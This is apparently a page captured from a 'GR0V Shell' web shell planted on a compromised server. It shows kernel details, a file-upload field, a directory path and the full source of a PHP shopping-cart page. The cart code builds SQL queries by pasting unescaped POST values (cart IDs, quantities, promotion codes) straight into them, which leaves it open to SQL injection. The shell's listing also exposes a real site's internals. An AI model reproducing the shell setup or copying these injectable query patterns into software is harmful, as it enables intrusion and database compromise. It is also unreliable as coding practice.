? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/gall/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/gall/cart.php

<? include("template/header.php");?>
<? 
	if(!isset($_SESSION[u_id])){
		echo "<script>window.location.href='login.php';</script>";
		die();
	}
?>

<? if(isset($_POST[p_id])){
		for($i=0;$i<count($_POST[cart_delete]);$i++){
			$db->query("delete from cart where cart_id =".$_POST[cart_delete][$i]);
		}
		for($i=0;$i<count($_POST[cart_quty]);$i++){
			//echo "update cart set cart_quty = ".$_POST[cart_quty][$i]." where cart_id = ".$_POST[cart_id][$i];
			$db->query("update cart set cart_quty = ".$_POST[cart_quty][$i]." where cart_id = ".$_POST[cart_id][$i]);
		}
	}
?>
<? if(isset($_POST[pro_code])){
	$pro = $db->queryUniqueObject("select * from promotion where pro_code ='".$_POST[pro_code]."'");

		  $product = explode(",",$pro->pro_data);
		  for($i=0;$i<count($product);$i++){
			 	if($product[$i]!=""){ 
 $db->query("update cart set  cart_pro_id = '".$pro->pro_id."' where cart_p_id = ". $product[$i]." and cart_u_id=".$_SESSION[u_id]." and cart_status = 0");
		  
		  		}
		  }
	}
?>
<?
$db->query("delete from cart where cart_quty = 0");
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
      
	   	  <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">What's In My Cart?</td>
            <td class="pageHeading" align="right">&nbsp;</td>
          </tr>

        </table></td>
      </tr>    
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">         
          <tr>
            <td class="otherpages">
<form  action="" method="post"><table border="0" width="100%" cellspacing="0" cellpadding="0" style="">
       
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td>
      </tr>

      <tr>
        <td style="padding:0px 10px 0px 0px;">
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="productListing">
  <tr>
    <td align="center" class="productListing-heading">Remove</td>
    <td class="productListing-heading">Product(s)</td>
    <td align="center" class="productListing-heading">Size</td>
       
    <td align="center" class="productListing-heading">Qty.</td>
     <td align="center" class="productListing-heading">Promotion</td>
    <td align="right" class="productListing-heading">Total</td>

  </tr>
  <? 
  $sql = "select * from cart,product,user where cart_u_id = ".$_SESSION[u_id]." and cart_u_id = u_id and cart_p_id = p_id and cart_status = 0";
  $res = $db->query($sql);
  $total =0;
  $tps=0;
  $tds=0;
  while($line = mysql_fetch_array($res)){
  ?>
  <tr class="productListing-even">
    <td align="center" class="productListing-data" valign="middle">
    <input type="checkbox" name="cart_delete[]" value="<? echo $line[cart_id]; ?>"></td>
    <td class="productListing-data"><table border="0" cellspacing="2" cellpadding="2"> 
   <tr>   
      <td class="productListing-data" align="center">
      <a href="product.php?p_id=<? echo $line[cart_p_id]; ?>"><img src="upload/<? echo $line[p_img];?>" border="0"  width="114">
      </a><br>
<b><? echo $line[p_name]; ?></b></td>  <!--height="86"-->
      <td class="productListing-data" valign="middle">&nbsp;</td>  </tr></table></td>
    <td align="center" class="productListing-data" valign="middle"><? echo $line[cart_p_size]; ?></td>
    
    <td align="center" class="productListing-data" valign="middle"><input type="text" name="cart_quty[]" value="<? echo $line[cart_quty]; ?>" size="4">
    <input type="hidden" name="p_id[]" value="<? echo $line[p_id]; ?>">
    <input type="hidden" name="cart_id[]" value="<? echo $line[cart_id]; ?>">
    </td>
    
  <td   class="productListing-data" valign="middle" align="left"><?
    //echo $line[cart_pro_id];
	
	$dz = $db->queryUniqueObject("select * from promotion where pro_id = ".$line[cart_pro_id]);
	
	if($line[p_pricex]!=''){
		$p=$line[p_pricex];
	}else{
		$p=$line[p_price];
	}
	$p = $line[cart_quty]*$p;
	$tps += $p;
	
	if($dz->pro_value!=""){
		$ds = (($dz->pro_value/100)*$p);
		$tds += $ds; 
		$p = $p-$ds;
		//echo $dz->pro_name."<br>";
		echo "Discounte :".$dz->pro_value."%";
		//echo "<br>".$p." - ".$ds;
	}
	
	
	
	 
 
  
  ?>&nbsp;</td>

    <td align="right" class="productListing-data" valign="middle"><b>
    	฿ <? 	echo  number_format($p, 2, '.', ',');
		$total +=$p;
		?>
    &nbsp;&nbsp;&nbsp;</b></td>
  </tr>
  <? } ?>
  
</table>
        </td>
      </tr>
      <tr>
        <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td>
      </tr>

<tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Sub-Total:</span> $<? 
		echo  number_format($tps, 2, '.', ',');
		//echo  $tps;?></b></td>
      </tr>
      <tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Discounte-Total: </span>$<? echo  number_format($tds, 2, '.', ',');?></b></td>
      </tr>
      <tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Total:</span> $<? echo  number_format($total, 2, '.', ',');?></b></td>
      </tr>
     <?  if($_SESSION[dealer]=="1"){ ?>
      <tr>
        <td align="right" class="main" style="padding:0px 10px 0px 0px;"><b><span style="float:left">Dealer Price:</span> $<? 
		$deal = $db->queryUniqueObject("select s_data from site where s_name = 'deal'");
		 
		echo number_format($total-($deal->s_data*$total)/100, 2, '.', ',');
		
		?></b></td>
      </tr>
     <? } ?> 
   <!--   <tr>  
        <td class="stockWarning" align="center"><br>Products marked with *** dont exist in desired quantity in our stock.<br>You can buy them anyway and check the quantity we have in stock for immediate deliver in the checkout process.</td>
      </tr>-->
         <tr>   
        <td class="stockWarning" align="left"> Promotion Code : <input name="pro_code" type="text" size="10"></td>
      </tr> 
      <tr>

        <td><img src="images/pixel_trans.gif" border="0" alt="" width="100%" height="10"></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="1" cellpadding="2" class="infoBox">
          <tr class="infoBoxContents">
            <td><table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr>
                <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td>
                <td class="main"><button class="azbutton" title="Update Cart" type="submit"><table border="0" cellpadding="0" cellspacing="0"><tr><td class="azbutton_left"></td><td class="azbutton_mid">Update Cart</td><td class="azbutton_right"></td></tr></table></button></td>

                <td class="main" align="center">
                  <span class="az-template-button"><span class="az-button-left">&nbsp;</span><span class="az-button-middle">&nbsp;Continue Shopping&nbsp;</span><span class="az-button-right">&nbsp;</span></span>                </td>
                <td align="right" class="main"><a href="checkout.php"><span class="az-template-button"><span class="az-button-left">&nbsp;</span><span class="az-button-middle">&nbsp;Checkout&nbsp;</span><span class="az-button-right">&nbsp;</span></span></a></td>
                <td width="10"><img src="images/pixel_trans.gif" border="0" alt="" width="10" height="1"></td>
              </tr>
            </table></td>
          </tr>
        </table></td>
      </tr>

    </table></form>
			</td>
          </tr>
        </table></td>
      </tr>
    </table>
    <? include("template/footer.php");?>

T1KUS90T
  root-grov@210.1.60.28:~$